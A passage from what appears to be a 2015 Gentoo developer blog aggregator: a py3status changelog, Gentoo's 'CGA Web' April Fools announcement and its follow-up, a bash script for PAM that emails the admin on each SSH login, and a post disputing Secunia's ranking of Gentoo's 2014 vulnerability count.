  • spaceapi module bugfix for space APIs without ‘lastchange’ field
  • keyboard_layout module incorrect parsing of “setxkbmap -query”
  • battery_level module better python3 compatibility

Other highlights

Full changelog here.

  • catch daylight savings time change
  • ensure modules methods are always iterated alphabetically
  • refactor default config file detection
  • rename and move the empty_class example module to the doc/ folder
  • remove obsolete i3bar_click_events module
  • py3status will soon be available on debian thx to Federico Ceratto !

Thank you for participating in Gentoo’s 2015 April Fools’ joke!

Now that April 1 has passed, we shed a tear as we say goodbye to CGA Web™, but also to our website. Our previous website, that is, which has been with us for more than a decade. Until all contents are migrated, you can find the previous version on wwwold.gentoo.org; please note that the contents found there are no longer maintained.

As this is indeed a major change, we’re still working out some rough edges and would appreciate your feedback via email to www@gentoo.org or on IRC in #gentoo-www.

We hope you appreciate the new look and had a great time finding out how terrible you are at Pong, and we are looking forward to seeing your reactions once again when we celebrate the launch of the new Gentoo Disk™ set.

As for Alex, Robin, and all co-conspirators, thank you again for your participation!

The original April 1 news item is still available on the single news display page.


Old April Fools’ day announcement

Gentoo Linux today announced the launch of its new totally revamped and more inclusive website which was built to conform to the CGA Web™ graphics standards.

“Our previous website served the community superbly well for the past 10 years but was frankly not as inclusive as we would have liked as it could not be viewed by aspiring community members who did not have access to the latest hardware,” said a Gentoo Linux Council Member who asked not to be named.

“Dedicated community members worked all hours for many months to get the new site ready for its launch today. We are proud of their efforts and are convinced that the new site will be way more inclusive than ever and thereby deepen the sense of community felt by all,” they said.

“Gentoo Linux’s seven-person council determined that the interests of the community were not being served by the previous site and decided that it had to be made more inclusive,” said Web project lead Alex Legler (a3li). The new site is also available via Gopher (gopher://gopher.gentoo.org/).

“What’s the use of putting millions of colours out there when so many in the world cannot appreciate them and who, indeed, may even feel disappointed by their less capable hardware platforms,” he said.

“We accept that members in more fortunate circumstances may feel that a site with a 16-colour palette and an optimal screen resolution of 640 x 200 pixels is not the best fit for their needs but we urge such members to keep the greater good in mind. The vast majority of potential new Gentoo Linux users are still using IBM XT computers, storing their information on 5.25-inch floppy disks and communicating via dial-up BBS,” said Roy Bamford (neddyseagoon), a Foundation trustee.

“These people will be touched and grateful that their needs are now being taken in account and that they will be able to view the Gentoo Linux site comfortably on whatever hardware they have available.”

“The explosion of gratitude will ensure other leading firms such as Microsoft and Apple begin to move into conformance with CGA Web™ and it is hoped it will help bring knowledge to more and more informationally-disadvantaged people every year,” said Daniel Robbins (drobbins), former Gentoo founder.

Several teams participated in the early development of the new website and would like to showcase their work:

  • Games Team (JavaScript Pong)
  • Multimedia Team (Ghostbusters Theme on 6 floppy drives)
  • Net-News Team (A list of Gentoo newsgroups)

Phase II

The second phase of the project to get Gentoo Linux to a wider user base will involve the creation of floppy disk sets containing a compact version of the operating system and a selection of software essentials. It is estimated that sets could be created using less than 700 disks each and sponsorship is currently being sought. The launch of Gentoo Disk™ can be expected in about a year.

Media release prepared by A Jackson.

Editorial inquiries: PR team.

Interviews, photography and screen shots available on request.

March 30, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

I found

Send email on SSH login using PAM

to be a great guide for setting up e-mail delivery for any successful log-in through SSH.

My current script:

#! /bin/bash
if [ "$PAM_TYPE" != "open_session" ]; then
  exit 0
fi

cat <<-BODY | mailx -s "Log-in to ${PAM_USER:-???}@$(hostname -f) \
(${PAM_SERVICE:-???}) detected" mail@example.org
        # $(LC_ALL=C date +'%Y-%m-%d %H:%M (UTC%z)')
        $(env | grep '^PAM_' | sort)
BODY

exit 0

March 26, 2015
Alex Legler a.k.a. a3li (homepage, bugs)
On Secunia’s Vulnerability Review 2015 (March 26, 2015, 19:44 UTC)

Today, Secunia have released their Vulnerability Review 2015, including various statistics on security issues fixed in the last year.

If you don’t know about Secunia’s services: They aggregate security issues from various sources into a single stream, or as they call it: they provide vulnerability intelligence.
In the past, this intelligence was available to anyone in a free newsletter or on their website. Recent changes however caused much of the useful information to go behind login and/or pay walls. This circumstance has also forced us at the Gentoo Security team to cease using their reports as references when initiating package updates due to security issues.

Coming back to their recently published document, there is one statistic that is of particular interest: Gentoo is listed as having the third largest number of vulnerabilities in a product in 2014.

from Secunia: Secunia Vulnerability Review 2015 (http://secunia.com/resources/reports/vr2015/)

Looking at the whole table, you’d expect at least one other Linux distribution with a similarly large pool of available packages, but you won’t find any.

So is Gentoo less secure than other distros? tl;dr: No.

As Secunia’s website does not let me see the actual “vulnerabilities” they have counted for Gentoo in 2014, there’s no way to find out how these numbers came about. What I can see, though, are “Secunia advisories”, which seem to be issued more or less for every GLSA we send. Comparing the number of posted Secunia advisories for Gentoo to those available for Debian 6 and 7 tells me something is rotten in the state of Denmark (scnr):
While there were 203 Secunia advisories posted for Gentoo in the last year, Debian 6 and 7 together had (55+249=) 304, yet Debian would have to have fixed fewer than 105 vulnerabilities in those 304 advisories to rank 21st or lower and thus not be included in the table above. That doesn’t make much sense. Maybe issues in Gentoo’s packages are counted for the distribution as well—no idea.

That aside, 2014 was a good year in terms of security for Gentoo: The huge backlog of issues waiting for an advisory was heavily reduced as our awesome team managed to clean up old issues and make them known to glsa-check in three wrap-up advisories—and then we also issued 239 others, more than ever since 2007. Thanks to everyone involved!